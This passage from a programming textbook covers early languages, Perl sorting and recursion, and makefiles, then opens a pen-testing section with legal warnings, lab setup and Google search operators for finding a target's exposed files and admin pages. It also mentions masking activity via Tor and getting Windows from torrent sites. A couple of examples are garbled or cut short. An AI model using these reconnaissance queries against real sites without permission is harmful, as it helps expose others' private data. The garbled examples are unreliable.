(0,0) we create a tuple of two bits and with (0,0,0) the tuple would be 3 bits in
size.

With this notation you can also create arrays and tuples of existing datatypes.
The following variable declaration shows this. Z0 is a single bit with currently
no value assigned. V0 is a tuple of datatype 12, which Zuse described as a
fraction. Z1 is an array of four bits.

     Z    V          Z
V    0    1          1
K         i
S    0    (12,12)    4x0

Plankalkul also had operators. They are simple. The left value is assigned to
the right variable, the opposite of what is normal today. For example 10 => Z0
assigns the value 10 to Z0.
The language also has conditional statements. The following statement
resembles the if-else block.

Z0 -.> Statement 1
Z0 -.> Statement 1

Plankalkul also had a simple looping structure. This is denoted with W for
Wiederholung. The loop continues until the precondition of every statement is
false, or until the special symbol ‘Fin’ is encountered.

Just like with all the other programming languages detailed in this book I also
include the Hello, World! example.

R1.1(V0[:sig]) => R0
R1.2(V0[:m x sig]) => R0
0 => i | m + 1 => j
[W [ i < j -> [ R1.1(V0[i: m x sig]) => R0 | i + 1 => i ]
]]
END
R1.3() => R0
'H';'e';'l';'l';'o';',';' ';'w';'o';'r';'l';'d';'!' => Z0[: m x sig]
R1.2(Z0) => R0
END

COBOL
COBOL is probably one of the oldest programming languages still in popular
use. The first version was released in 1959. It was designed by a committee
whose objective was to make COBOL portable, easy to understand and easy to
use in the business world. Because of the lack of any academics within its
development committee the language developed several idiosyncrasies which I
discuss below.
COBOL has often been criticized for being archaic and verbose. The latter may
be true but most of the criticism is unfounded and seems to be no more than a
continuation of decades old opinions. Up until the late 90’s COBOL was
the most widely deployed language in the world. Even as of 2016 there are over
200 Billion lines of code known to be deployed, with the rate increasing
annually between 3 and 4 percent. COBOL is a unique language; it lacks some
features such as recursion because its original design committee did not think them
worthwhile. That, along with several other idiosyncrasies, has made the
language unpopular in the academic world, where C, C#, Python and Java
dominate. Yet COBOL is very good at what it does: support back-end business
processes.
It is said that despite COBOL’s lessening popularity, those with expert
knowledge of the language on average earn 10 thousand dollars per year more.
Even if they don’t do any COBOL programming! I have included COBOL in
this chapter for a variety of reasons. The first is obvious. A lot of COBOL has
been written over the years. It needs to be maintained, translated or ported and
so chances are you will come in contact with COBOL. The second reason
stems from the first. If besides C, Python or Java you have COBOL on your
resume you will stand out from the crowd. In this chapter I will show several
small examples of COBOL code.
Getting COBOL to compile is a lot easier now than it used to be, when most
compilers were proprietary. As it happens GNU has a COBOL compiler with runtime
libraries for Linux. It used to be called OpenCOBOL; now it’s GnuCOBOL. To
install the COBOL compiler just type in the following command.
sudo apt-get install open-cobol
We will get started writing COBOL straight away. Our first program is of
course the ‘Hello, World!’ example popularized by the book The C
Programming Language. Just type in or copy the following lines and put them
in a file called HELLO.COB
*> GnuCOBOL Hello World example
identification division.
program-id. hello.
procedure division.
display "Hello, world!"
end-display
goback.

This code is compiled and run as follows.

$ cobc -x -free hello.cob
$ ./hello
Hello, world!

The first line is a comment, which starts with ‘*>’; everything afterwards is
ignored by the compiler. Alternatively a comment can just start with an asterisk
*. The second line, ‘identification division.’, identifies the program. The line
‘program-id. hello.’ assigns a name to the program, in this case hello.

Finally we end up with the lines of code that actually perform processing. The
line ‘display "Hello, world!"’ prints the phrase Hello, world! to the Terminal.
With ‘end-display’ we signal there will be no more output, which is followed
by the program terminator ‘goback’. Only the last three lines were actually
statements as we know them from languages such as Python and C. The first four
lines were part of the program structure.
Luckily the COBOL syntax is easy to understand. Its high-level abstraction can
at times almost read like English. However, it used to be worse. In the days
when punch cards were used to store and edit programs, each line of a program
began with a six-digit line number.

COBOL was initially intended to be read pretty much like any English text.
That didn’t happen, but it is structured like a text. A COBOL program is
divided into divisions, paragraphs and sentences. Some of these elements were
already shown in the sample program, but below these concepts are detailed
further.

Divisions
Every COBOL program should consist of four divisions, but only two are strictly
necessary. The first division is the IDENTIFICATION DIVISION, which
provides the unique program identification. The program name comes after
the keyword PROGRAM-ID and can be at most 8 characters in size.
Note the end of line dot ‘.’ after the keyword and after the program name in the
example below.

IDENTIFICATION DIVISION.
PROGRAM-ID. TESTPROG.

The second division is the ENVIRONMENT DIVISION; it describes the
computer and other devices used to compile and execute the program. The fact
that such a division exists may be one of COBOL’s key strengths. It is also
entirely optional. It is further divided into a CONFIGURATION SECTION and an
INPUT-OUTPUT SECTION; both are again optional.

The third division, DATA DIVISION is

The fourth division, PROCEDURE DIVISION, is necessary. It contains the
program’s executable statements ordered into sections and paragraphs. The
code can then be executed using the PERFORM and GO TO keywords. Below
is an example of a procedure division that is organized into two blocks.

PROCEDURE DIVISION.
Begin.
    PERFORM DisplayHelloWorld 10 TIMES.
    STOP RUN.

DisplayHelloWorld.
    DISPLAY "Hello World!".

This example introduced several new keywords. These are verbs and are
followed by the operands on which the verb acts. COBOL verbs can be
categorized according to their type. At the moment there are 47 such verbs.

I finish this section on COBOL with a simple program. It prompts the user to
enter two single-digit numbers. The numbers are added together and the result
is displayed on the computer screen.

IDENTIFICATION DIVISION.
PROGRAM-ID. AddUp.
AUTHOR. JJ Kane.
DATA DIVISION.
WORKING-STORAGE SECTION.
01 FirstNum   PIC 9     VALUE ZEROS.
01 SecondNum  PIC 9     VALUE ZEROS.
01 CalcResult PIC 99    VALUE 0.
01 UserPrompt PIC X(38) VALUE "Please enter two single digit numbers".
PROCEDURE DIVISION.
CalculateResult.
    DISPLAY UserPrompt
    ACCEPT FirstNum
    ACCEPT SecondNum
    COMPUTE CalcResult = FirstNum + SecondNum
    DISPLAY "Result is = ", CalcResult
    STOP RUN.

Most of the program is easy to understand, even the parts not previously
explained. A few areas may be difficult to understand. The 01 before the
variable declaration in the DATA DIVISION refers to the level number, which
represents the data hierarchy. Here the hierarchy is the same for all. Behind the
variable name we see the storage declaration. PIC stands for picture, which shows
the maximum value to hold: here the values between 0 and 9 for the first two
variables and 0 and 99 for the third. The use of the 9 and 99 implicitly means
the variable will store numeric values. For variable UserPrompt the X after
PIC means it will contain alphanumeric values. Alphabetic values are declared
with PIC A. Note the difference between the first two variables and the third.
With VALUE ZEROS we initialize the variable with a 0, with VALUE 0 we
don’t.

Pascal
Of the four big high-level programming languages that were developed in the
late 50’s ALGOL was probably the most successful. Its legacy remains in the
many languages that were developed from it. FORTRAN has also influenced
many modern languages, but ALGOL solved many of the problems perceived
to exist with the original version of FORTRAN. ALGOL is now rarely used,
but its immediate successors were Pascal and C. Those two languages in turn
form the basis of most of the popular languages used today such as Java, C++,
C#, Ruby, Perl and of course Python.
Pascal was developed in the late 60’s by noted Swiss computer scientist
Niklaus Wirth. Wirth initially developed several versions of ALGOL before
working on Pascal. His hope for Pascal was to create a language that could
be easily taught to students. It included a lot of structured programming
paradigms such as code blocks, functions, and for and while loops.

Figure 44. Niklaus Wirth


Pascal is still used today, but the language has become overshadowed by its
successors such as Ruby and Python. Niklaus Wirth went on to develop other
languages such as Oberon and Modula, but neither series managed to gain the
same level of popularity that Pascal once had. However, Pascal was developed
further with lessons learned from both. These days Pascal is considered one
language too far and is slowly losing ground. The last time I came in contact
with it was when I had to update a shipping container system written in 1989 that
used Pascal code.

Program HelloWorld(output);
Begin
  Write('Hello, world!')
End.

Haskell
One important subset of programming languages are the functional languages.
These developed almost entirely separately from the big four languages and their
successors. Functional languages are said to have no side-effects and no imperative
programming. The latter means they have no statements, and with the former we
mean that a function call has no effect on its callers or on the outside
world. Functional languages instead have mathematical functions with no state.
One of the most popular functional languages was Miranda. It was inspired by
many languages that at least had some aspects of a functional language, such as
Scheme and ML. Miranda had however one major flaw: it was proprietary. In
the late 80’s many proposals were made to find a replacement. An organized
effort to streamline this process eventually yielded Haskell, named after the
famous logician Haskell Curry.
Below you can find a simple Haskell program.
module Main where
main :: IO ()
main = putStrLn "Hello, World!"

If you’re interested in learning more about Haskell, and perhaps preparing for a
serious academic career in Computer Science, then I can recommend the book
Learn You a Haskell for Great Good! It is free for download online. If you
want to get the Haskell experience in condensed format check out Derek
Banas’s video on YouTube. Despite the academic interest in Haskell few
practical programs have been written in it.

Wait! There is more…
Programmers and computer scientists like to experiment. One group of languages
that came to exist are known as esoteric languages. Examples include
Whitespace, MALBOLGE and TRUMPScript. The first, Whitespace, uses
spaces and tabs as operators and includes a compiler written in the same
language. MALBOLGE was created to be the most difficult language ever
written. It was developed in 1998 by Ben Olmstead. It took many years
before the first program was written. This was done using a genetic learning
algorithm. All the program did was print Hello, World! That program
you can see below.

(=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc

MALBOLGE has continued development and has found a significant niche
interest. Recently it was depicted in an episode of the Sherlock Holmes
inspired TV show Elementary. In the tenth episode of season 1 Sherlock and
Joan need to solve a case wherein MALBOLGE was used to communicate the
code to a secure safe, Leviathan.

Chapter 5 Algorithms with Perl


Learning how to write small computer programs will open a new world. If you
try hard enough, small programs will become full applications multiple
megabytes in size. There is no real impediment to increasing application size.
However, if your program has to perform a lot of calculations and your
customer or boss demands that it runs as fast as possible, you will need to know
about algorithms. So what are algorithms? To some, any program performs a
task and is automatically an algorithm. Others consider only tasks that can be
described mathematically to be true algorithms: they need to be self-contained
and follow well-defined operations step by step. Over several decades Computer
Scientists have discovered the best ways to perform actions such as sorting
lists, processing data or machine learning.

In this chapter I will explain several important algorithms through the use of
Perl, a general purpose language that, like Python and the shell, is also often
used as a scripting language. Perl was first released in 1987, was designed by
Larry Wall and gained popularity because of the ease with which it parses text
and uses regular expressions. Perl can at times be difficult to read. With
simple programs such as text parsers it is not more difficult than C or Python,
but large programs become much harder to read, and as such it has been
referred to as a write-only language.

Perl 5 and Perl 6
Despite the power of the Perl language its use has sadly declined. The
proliferation of new languages and the continuing popularity of Python, Java
and C have not done old-school languages such as Perl and Pascal any favors.
What has also done irreparable harm is the divide created by the announcement
of Perl 6 in 2000. Perl 5 development never stopped, so the language was
effectively forked. Despite Perl 6 being announced in 2000, its first stable
release only arrived at the end of 2015 (the language has since been renamed
Raku). For our examples we will be using Perl 5. If you are not certain which
version you have installed in Linux just type
perl -v
into the command line. Chances are it is Perl 5.
Perl is an interpreted language just like Python. Programs written in Perl have
the extension .pl. As a first simple example type the following lines into a
file called HelloWorld.pl

use strict;
use warnings;
print "Hello World!\n";

You can run the program with the command

perl HelloWorld.pl

If you omit the first two lines the program will still print Hello World! Using
strict and warnings makes for easy debugging: strict forces you to declare
variables with my before you use them, and warnings flags suspicious constructs
such as the use of an undefined value. Perl is unusual in its choice of
variables. Just like PHP it is weakly typed. The language does not explicitly
cast variables, so a string can just as easily be interpreted as an integer or a
float. Java, by contrast, requires the programmer to convert a String to an int
with the Integer.parseInt() function. Perl has only three kinds of variables:
scalars ($), arrays (@) and hashes (%). Roughly speaking they correspond to
simple variables, arrays, and dictionaries. Simple variable names start with a
dollar sign $. So to store the string Hello, world! you type in the following:

my $sentence = "Hello, world!";
Input from the Terminal is collected with standard input or STDIN. The
program will wait until a user types something and presses Enter. The value
read includes the trailing newline; chomp removes it.
my $anothersentence = <STDIN>;
chomp $anothersentence;
print "You typed in $anothersentence\n";

Programs can also read multiple lines by changing the variable sigil $ to @,
an array.
my @anothersentence = <STDIN>;
print "You typed in the following sentences @anothersentence";

Now pressing Enter will no longer suffice to close standard input. Instead,
press Control-D. If you typed in multiple lines you will see each of them as
output. Of course Perl also has conditionals and for loops.

use strict;
use warnings;

print "Enter number\n";

my $num = <STDIN>;
chomp $num;    # drop the trailing newline

hello($num);

# compare the numbers 0 to 10 with the number that was entered
sub hello {
    my ($limit) = @_;
    for my $i (0 .. 10) {
        if ($i > $limit) {
            print "$i is larger than $limit\n";
        } else {
            print "$i is not larger than $limit\n";
        }
    }
}

Sorting algorithms
Sorting algorithms are amongst the most popular algorithms and any programmer
must know them. Chances are most projects will require sorting. With luck you
can find a library that offers an optimized sorting routine. However, one may
not always be available, or the data you are working with may be atypical.
In essence a sorting algorithm will sort a list or array of values (integer, float,
string etc.) in a predefined order (numeric or alphabetical). For smaller
applications the speed of an algorithm is not relevant. If it takes a less efficient
algorithm 0.2 seconds to sort a list of a thousand bank numbers then there is
little real incentive to implement an efficient algorithm that can do it in 0.1
seconds. But if you have lists of a million records, or there is a lot of data
processing, then you should be able to implement the best sorting algorithm
there is. For this tutorial we will start with bubble sort, the simplest but
usually also the slowest algorithm. However, first we need a way to compare
algorithm speed, and that is Big O notation. Big O describes how the number of
steps an algorithm takes grows with the size n of its input, ignoring constant
factors. If the number of steps grows in proportion to n, the algorithm runs in
linear time, or O(n): doubling the input doubles the work. Linear time would be
the Holy Grail for sorting, but an algorithm that sorts by comparing elements
can only achieve it in the special case where the list is already sorted and a
single pass confirms that; in general, comparison sorting needs on the order of
n log n steps at best. At the other end there is quadratic time, or O(n²):
doubling the input quadruples the work. Poor algorithms, or good algorithms on
unlucky input, end up there. A list sorted from high to low that has to be
sorted low to high is a typical worst case. Note that Big O is about how the
cost grows, so an O(n log n) algorithm is not necessarily faster than an O(n²)
one on a ten-element list; it is at a million elements that the difference
becomes decisive.

Bubble sort
The bubble sort algorithm is easy to understand. If you have an array of 5
integer elements that need to be sorted in increasing order, the algorithm
starts with the first element and compares its value with the second. If the
second value is less it swaps them. Then the algorithm compares the second
and third elements and checks again. If the third element has a value less than
the second it swaps them. It goes through this process until the end of the
list or array is reached. The list will not be sorted perfectly after one pass, but
it is an improvement. The list is sorted once a full pass performs no more
swaps. The name of the algorithm comes from the fact that the highest value
found at the beginning of the list will be swapped all the way to the end in one
pass, like a bubble rising. Bubble sort is slow: the best case is O(n), but only
when the list is already sorted. Average and worst cases are O(n²). Below is a
Perl implementation of bubble sort.

use strict;
use warnings;

# to use the algorithm we create an array; the keyword 'my' makes @numbers
# a lexical (local) variable
my @numbers = (96, 12, 35, 7, 82, 72, 3, 25, 43, 51);
# we call the function bubble_sort with the array and print the result
bubble_sort(@numbers);
print "@numbers\n";

# bubble_sort sorts its argument list in place: the elements of @_ are aliases
# for the caller's elements, so swapping @_[$i, $i + 1] swaps @numbers too
sub bubble_sort {
    my $swapped;
    do {
        $swapped = 0;
        for my $i (0 .. $#_ - 1) {
            # compare each element with its neighbour and swap if out of order
            if ($_[$i] > $_[$i + 1]) {
                @_[$i, $i + 1] = @_[$i + 1, $i];
                $swapped = 1;
            }
        }
    } while ($swapped);    # stop after a full pass without swaps
}

Quicksort
One of the best sorting algorithms is Quicksort, first conceived by Tony Hoare
in 1959 and published in 1961. Hoare is also famous for Hoare logic, a
formal system of rules with which the correctness of a part of a program can be
proved. Quicksort is a bit more difficult to understand than bubble sort, but I
will do my best. Imagine you have an unordered list of nine integers like the
one shown below in brackets.
[6,5,1,3,8,4,7,9,2]
Now one element, the pivot, is selected. As an example we take the last one, 2.
Now from the left number 6 to the right number 9 we decide for each element
whether it is less than or greater than 2. We end up with two smaller lists, with
the pivot 2 in the middle. The smaller list to the left holds just the integer 1
and is already in order.
[1,2,{6,5,3,8,4,7,9}]
As you may guess, this process is repeated for the larger list. Again we select
a pivot, say 6. Then we go through the remainder of the list and decide which
elements are greater and which are less than 6. The list will look like
[1,2,{5,3,4},6,{8,7,9}]
Both sub-lists are then partitioned in the same way until every sub-list is in
order. Quicksort has a worst case of O(n²), which may not seem like an
improvement over bubble sort. Yet its average performance is O(n log n) and
thus decidedly better than bubble sort. The worst case occurs when the pivot
repeatedly turns out to be the smallest or largest remaining element, for
example when the first element is always chosen as pivot and the input is
already sorted; choosing the pivot at random, as the implementation below does,
makes that unlikely. Quicksort is probably the most popular sorting algorithm
there is. Below you can find an implementation of Quicksort.

use strict;
use warnings;

sub quick_sort {
    return @_ if @_ < 2;    # base case: a list of 0 or 1 elements is sorted
    # select a random element as the pivot and remove it from the list with splice
    my $pivot = splice @_, int rand @_, 1;
    # grep selects the elements below and at-or-above the pivot; quick_sort is
    # called again on both parts until the base case is reached
    return (quick_sort(grep { $_ < $pivot } @_),
            $pivot,
            quick_sort(grep { $_ >= $pivot } @_));
}

# create an unordered list of integers
my @quick = (6, 5, 1, 3, 8, 4, 7, 9, 2);

# call the function quick_sort
@quick = quick_sort(@quick);

# print the newly ordered list
print "@quick\n";
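To make the Big O discussion at the start of this chapter concrete, here is an added example, written in Python rather than Perl and not part of the book's code, that counts how many comparisons bubble sort and quicksort actually make as the input grows. The two sort routines are Python renderings of the algorithms described above with a counter added; the input sizes and the seed are arbitrary choices. The third column shows the O(n²) worst case mentioned above: a quicksort that always takes the first element as pivot, fed an already sorted list. That worst case is not only a performance curiosity. When an attacker controls the input to a sort or a hash table, feeding it data that forces the worst case is a known way to exhaust a server's CPU, which is one reason library implementations choose pivots carefully.

```python
"""Count comparisons made by bubble sort and quicksort on inputs of growing
size, to make the O(n^2) versus O(n log n) difference concrete.
Added example, not code from the book: the sort routines are Python
renderings of the Perl algorithms in this chapter, instrumented with a counter."""
import random


def bubble_sort(items):
    """Adjacent-swap bubble sort that stops after a pass with no swaps.
    Returns (sorted_list, comparisons)."""
    data = list(items)
    comparisons = 0
    swapped = True
    while swapped:
        swapped = False
        for i in range(len(data) - 1):
            comparisons += 1
            if data[i] > data[i + 1]:
                data[i], data[i + 1] = data[i + 1], data[i]
                swapped = True
    return data, comparisons


def quick_sort(items, pivot_rule="random"):
    """Recursive quicksort. pivot_rule 'random' picks a random pivot;
    'first' always takes the first element, which degrades to O(n^2) on
    already sorted input. Returns (sorted_list, comparisons)."""
    data = list(items)
    if len(data) < 2:
        return data, 0
    idx = random.randrange(len(data)) if pivot_rule == "random" else 0
    pivot = data.pop(idx)
    lower = [x for x in data if x < pivot]
    upper = [x for x in data if x >= pivot]
    comparisons = len(data)  # every remaining element is compared with the pivot once
    left, c_left = quick_sort(lower, pivot_rule)
    right, c_right = quick_sort(upper, pivot_rule)
    return left + [pivot] + right, comparisons + c_left + c_right


def comparison_table(sizes, seed=1):
    """For each n, sort one shuffled list (bubble sort and random-pivot
    quicksort) and one already sorted list (first-element-pivot quicksort)
    and return rows of (n, bubble, quick_random, quick_first_on_sorted)."""
    rng = random.Random(seed)
    random.seed(seed)  # makes the random pivot choices reproducible
    rows = []
    for n in sizes:
        shuffled = rng.sample(range(n * 10), n)  # constructed input, distinct values
        ordered = sorted(shuffled)
        _, bubble = bubble_sort(shuffled)
        _, quick_random = quick_sort(shuffled)
        _, quick_first_sorted = quick_sort(ordered, "first")
        rows.append((n, bubble, quick_random, quick_first_sorted))
    return rows


if __name__ == "__main__":
    print("    n    bubble  quick(random)  quick(first pivot, sorted input)")
    for row in comparison_table([16, 64, 256, 1024]):
        print("%5d %9d %9d %9d" % row)
```

Quadrupling n multiplies the bubble sort count and the first-pivot quicksort count by about sixteen, while the random-pivot quicksort count grows only a little faster than fourfold, which is the n log n curve showing through.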

Recursion
A basic tenet of Computer Science is recursion. It allows complex problems to
be solved by solving many simpler problems instead. With recursion we
repeatedly call the same method or function with a slightly simpler version of
our problem. The quicksort algorithm of the previous section uses recursion and
is considered an excellent example of its use. Note how the unordered list is
divided into two around the pivot. Then for both parts the function is called
again with the smaller list as the new input. This is the recursive step. Of
course the process cannot go on forever. We need a rule for when we consider
a list sorted. The smallest possible list has one (or zero) elements and is
automatically sorted. This is called the base case. Such a list is returned with
the return statement. The sorted left part, the pivot and the sorted right part
are then joined, and once the right-most recursive call has returned the entire
list is sorted.
Another example of a recursive algorithm that calls the same function over and
over until the base case is reached is calculating the factorial n! of a number n.
An example would be 5!, which equals 120 (5*4*3*2*1). Keep in mind that every
recursive call consumes stack space: with warnings enabled Perl reports 'Deep
recursion on subroutine' once a sub has called itself 100 levels deep, and a
recursion that never reaches its base case will eventually exhaust memory.
Validate the input before recursing; in the program below a negative number
would never reach 0. The Perl implementation would be as follows
use strict;
use warnings;

# request a number whose factorial to compute
print "Enter number\n";
my $num = <STDIN>;
chomp $num;
die "Please enter a non-negative integer\n" unless $num =~ /^\d+$/;

# call the function, with 1 as the starting value of the running product
my $fac = fact($num, 1);

# print the factorial
print "factorial: $fac\n";

# fact multiplies the running product $acc by $n, $n - 1, ... down to 1
sub fact {
    my ($n, $acc) = @_;
    if ($n == 0) {                          # base case
        return $acc;
    } else {
        return fact($n - 1, $n * $acc);     # recursive step
    }
}

I hope you have enjoyed this brief foray into the world of algorithms and the
use of Perl. Remember, algorithms transcend programming languages. They
form the heart of computer science and are worth devoting time to after your
initial familiarization with programming.

Make
Up until now the example programs in this textbook have been simple. They
have always been small enough to fit into one source file. On the other hand
we have used libraries a lot; C lines such as #include <stdio.h> must by now
feel like second nature. If a C program is divided into multiple source files
(extension .c) and we want to use code from one of them in another, we need to
reference it just as we reference a library. We need to create header files
(extension .h) for each source file and learn to reference them. As our program
grows bigger we will eventually run into a problem: compiling the code becomes
tedious. It is not just a matter of using a wildcard * to select all the source
files in a folder; as the source files reference each other we need to be
careful, and we do not want to recompile everything after every small change.
To help programmers Linux comes equipped with the make command, which
automates compiling. The examples below are useful for both C and C++ code.
All we need to do is write a makefile, which is the topic of this chapter. But
first, let's learn about those pesky header files.

Header files
You have come across .h header files before without fully understanding what
they mean. Essentially they contain function declarations, variable declarations
and macro definitions that can be shared between several .c source files.
Besides the .h files that come with the compiler, such as stdio.h, you can also
create your own.
The example below shows how a C program can use a function defined in
another source file. They are connected through a .h file.
First up is hellomake.c, which contains the main function that calls
myPrintHelloMake(). The function is not defined in this file; the include of
hellomake.h gives the compiler the function's prototype, so it knows how the
function is to be called.

#include <hellomake.h>

int main(void) {
    myPrintHelloMake();
    return 0;
}

hellomake.h contains only the declaration (the prototype):

void myPrintHelloMake(void);

The implementation lives in hellofunc.c. Note that neither hellomake.h nor
hellomake.c mentions hellofunc.c: the compiler does not go looking for it. Each
.c file is compiled separately into an object file, and it is the linker that
matches the call in hellomake.o with the definition in hellofunc.o, which is
why both .c files must be named on the compile line below.

#include <stdio.h>
#include <hellomake.h>

void myPrintHelloMake(void) {
    printf("Hello makefiles!\n");
}

An observant reader may think it more natural for the header file to be named
hellofunc.h, as hellofunc.c implements the function that is prototyped in
hellomake.h. I agree, but it is not required. You can make the change if you
want to. The program is compiled with the following line

gcc -o hellomake hellomake.c hellofunc.c -I.

The -I. flag tells gcc to also search the current directory for headers
included with angle brackets, which is why #include <hellomake.h> works
here; for your own headers the form #include "hellomake.h" searches the
directory of the including file without needing -I.
You may be tempted to forgo .h files and think you can program everything in
one source file, but you will lose a lot of modularity which will pay dividends
over time.

Makefile
So we have a number of scattered source files that we compile with a
command that gets more elaborate as the project grows. Preferably you want to
keep the compile command handy in a file to reuse over and over. You can
store such a compile command in a makefile. The advantage of a makefile is
that source code can be easily distributed and compiled by users themselves.
The compile operation is started by simply typing make on the command line.
Below is a very simple makefile.

hellomake: hellomake.c hellofunc.c
	gcc -o hellomake hellomake.c hellofunc.c -I.

The first line is a rule: the target hellomake depends on the two .c files, and
make only runs the command below it when one of those files is newer than
hellomake (or hellomake does not exist yet). A common misconception about
compiling is that all the .h files that are referenced will see their
corresponding .c files also compiled. This is not true.
Note one important detail about makefiles: the command line under a rule must
start with a TAB and NOT a series of spaces, or make stops with a 'missing
separator' error.
After you have called make you will find the compiled program hellomake
ready to be run whenever you like. There are a lot of options to use in a
makefile, so let's delve into them.

CC=gcc
CFLAGS=-I.
DEPS = hellomake.h

%.o: %.c $(DEPS)
	$(CC) -c -o $@ $< $(CFLAGS)

hellomake: hellomake.o hellofunc.o
	$(CC) -o hellomake hellomake.o hellofunc.o -I.

.PHONY: clean
clean:
	rm -f *.o *~

At first the additions may seem daunting and you may be thinking 'if the simple
makefile worked...'. For larger projects many of these commands and flags
will come in handy. The first two lines are self-explanatory: with CC we state
explicitly the compiler to use and with CFLAGS which additional flags the
compiler should use. In this case we just use -I. as before; this is also the
place for warning and hardening flags such as -Wall.

The macro DEPS lists the header on which every object file depends, so that
whenever hellomake.h is changed the corresponding .c files are recompiled
too. Forgetting this leads to hard to find problems where an object file was
built against an old version of the header. The pattern rule that follows does
the recompiling: %.o: %.c $(DEPS) says that any file ending in .o is built from
the .c file with the same stem plus the headers listed in DEPS. In the command
line, $@ stands for the target (the .o file) and $< for the first prerequisite
(the .c file), and -c tells the compiler to produce an object file without
linking.

The following rule is more interesting. With these lines we state that the two
object files hellomake.o and hellofunc.o are the dependencies of the
executable. This ensures that each .c file is compiled, through the pattern rule
above, before the executable hellomake is linked.

hellomake: hellomake.o hellofunc.o
	$(CC) -o hellomake hellomake.o hellofunc.o -I.

The last lines add a new rule to the makefile called clean, which you run with
make clean.

.PHONY: clean
clean:
	rm -f *.o *~

With this rule we simply state that all files with extension .o and all editor
backup files ending in ~ are to be removed. They all too often clutter
directories and are not needed for the executable program or the original
source files. The .PHONY line tells make that clean is not the name of a file to
be built, so the rule runs even if a file called clean happens to exist.

Part 3: Hacking

Chapter 0 On Hacking + A Warning

What is hacking really?
As you have bought this book it goes without saying that you are not a script
kiddie. Script kiddies are persons, usually between the ages of 12 and 18
(being optimistic about 18), who use ready-made programs in an attempt to gain
access to other systems. These days they mostly confine their antics to
attempting to hack the Facebook accounts of people they don't like.
Script kiddies don't learn much about the underlying technology they use. They
don't learn about methods, the innards of systems and such. After completing
part 1 of this book you know more about Linux than they ever will, and I taught
you a thing or two about Windows as well. This final part of the book is meant
to turn you into a hacker, and I don't mean somebody who gains access to other
systems. I mean somebody who learns! That is the true meaning of the word
hacker. I will try to teach you by performing penetration testing, the way
security experts perform tests for clients. This means you will not become a
cracker (malicious hacker) either.
With what you learn in this part of the book you are not yet a true pen tester. If
you're a teenager looking for an internship in pen testing, then perhaps you
can use the knowledge contained in this book to perform your first tests for a
client. You can then learn on the job and become a true pen tester within about
6 months or so.
If you are older: a jobseeker, a manager or a software engineer looking for a
change, then you can use the knowledge in this book to keep up with
discussions on network security. As a manager you can flaunt more than just
rudimentary knowledge and know when junior pen testers are talking nonsense.
Now it’s time to get started!

Figure 45. Kali Linux built-in tools

Using Kali Linux
Ever since the introduction of this book I have suggested trying more than one
flavor of Linux. Ubuntu is a good starting point, but Debian, Mint, Arch Linux
and Fedora are all viable choices. Nonetheless, for hacking purposes Kali
Linux is the go-to distro. It is based on Debian and has nearly all important
pen-testing tools pre-installed. Kali Linux can also be used on a daily basis,
although its own documentation advises against it: it is tuned for pen testing,
not for use as a general desktop. It has media players and almost everything
else you have come to expect if you're familiar with Ubuntu. I would install
LibreOffice to complete the system.
root@kali:~# apt-get install libreoffice
You don't have to use Kali Linux if you don't want to. You can install every
tool I describe manually, though some are tedious to install and configure
properly. If you already use Ubuntu or Windows then I advise the use of
virtualization software. Through such software you can run another OS on top
of the one you already use, so there is no need to dual boot. There are free
versions available to run virtual operating systems: VMware and VirtualBox
are each excellent.

Setting up your Hack Lab
If you have installed Kali Linux as a virtual machine, whether on Windows or on
Linux, then you have two machines. One can act as a target for you to hack.
Ideally you would also install an old version of Windows XP and an old Ubuntu.
They have known security flaws that you can exploit and can serve as valuable
lessons. Obtaining an older version of Ubuntu is relatively easy, but Windows
XP or Windows 7 may be harder. If you're a student maybe you are enrolled in a
college software distribution scheme, perhaps you have a DVD with the OS lying
around, or you download one using a torrent site. All in all you should have
four or five operating systems when you're done setting up your hack lab. You
can make do with just two, Windows with Kali as a virtual OS, but neither of
these has many easy-to-exploit security flaws. Take your time to get everything
sorted; if you have an old laptop or computer with an old OS, even better.
If you're going to attempt to hack one of your virtual operating systems you
need to remember that it is not worth the risk of remaining connected to your
network. All it takes is one typo and your command to scan the old version of
Windows XP becomes a command to scan a computer somewhere on the
internet. This is not only illegal, but it is possible to trace the scan back to
you. Both VirtualBox and VMware offer a host-only or internal network mode:
put the attacker and target VMs on such an isolated network so that the lab has
no route to the internet at all, and check with ip addr (Linux) or ipconfig
(Windows) that the target really is at the address you are about to scan.
Professional crackers never hack from their own home, nor do they use their
neighbor's wireless internet connection. They use a directional wireless
adapter and the Tor network to mask their efforts. Whenever people are
arrested for hacking a government organization or company you immediately
know they made that kind of mistake.

A Warning!
I have mentioned it before and I will say it once more. Hacking, or maliciously
accessing other systems, computers or services, is illegal. In fact, performing
reconnaissance and scanning of other systems is illegal in most parts of the
world. If you perform a penetration test you need explicit permission from the
owner of those systems. This must be in writing! In fact, you need to establish a
contract that states exactly what you are allowed to do, against which systems
and during which period. After you have performed your test you should never
share the information with anyone but the owner. If that person doesn't fix any
of the security holes afterwards, then tough luck. You have done your part!
Think about what it means if you violate these conditions. With a criminal
record you will never be able to get a job in network security. Many other IT
jobs will also be closed to you. In fact, it would undo everything you have
done since you started reading this book.

You were warned!
So let’s get to it and find out what pen testing is all about!

Chapter 1 Reconnaissance
The first step in performing a penetration test is to get to know your target
system. A target, presumably a company, may have a website through which
they communicate with customers and perform transactions. What follows is a
discussion of a number of tools that can be used to glean public information on
your target.

Using Google
Google's crawler indexes everything it can reach, including pages and files
that were never meant to be public. Everything the crawler collects ends up in
the search index, so you have to know how to ask the search engine for the
relevant information. Most Google users just type keywords into the search
bar, but it also accepts search operators, often called Google dorks. What
follows is a set of such operators that have, since their inception, set the
security world on fire.

Site:
With site: you see indexed pages of only your target, rather than pages about
the target. All public information about your target that was not published by
the target itself is left out, so no press releases or other internet noise.
As an example, type the following line into Google for your target:
site:targetwebsite.com
We can further limit results by adding keywords separated by spaces.
site:targetwebsite.com secretfiles
The latter example will only return pages of the target website that contain the
word secretfiles. As you may guess there are plenty of people who leave
private information on their websites.

Intitle:
With intitle: you can search for only those websites with the phrase secretfiles
in their title, useful when attempting to gauge the exposure your target has.
intitle:secretfiles

Inurl:
With inurl: the search is restricted to pages with the stated keyword in their
URL.
inurl:admin
This example will search URLs for the word admin and perhaps reveal
administration pages or login forms. Operators can be combined, so
site:targetwebsite.com inurl:admin limits that search to the target.

Filetype:
With this filter you can search for specific file types on websites. An example
could be
site:www.targetwebsite.com filetype:pdf
which searches for PDF files at targetwebsite.com. Another common file type
that may contain sensitive information is ppt (PowerPoint). Use filetype:ppt to
find those.
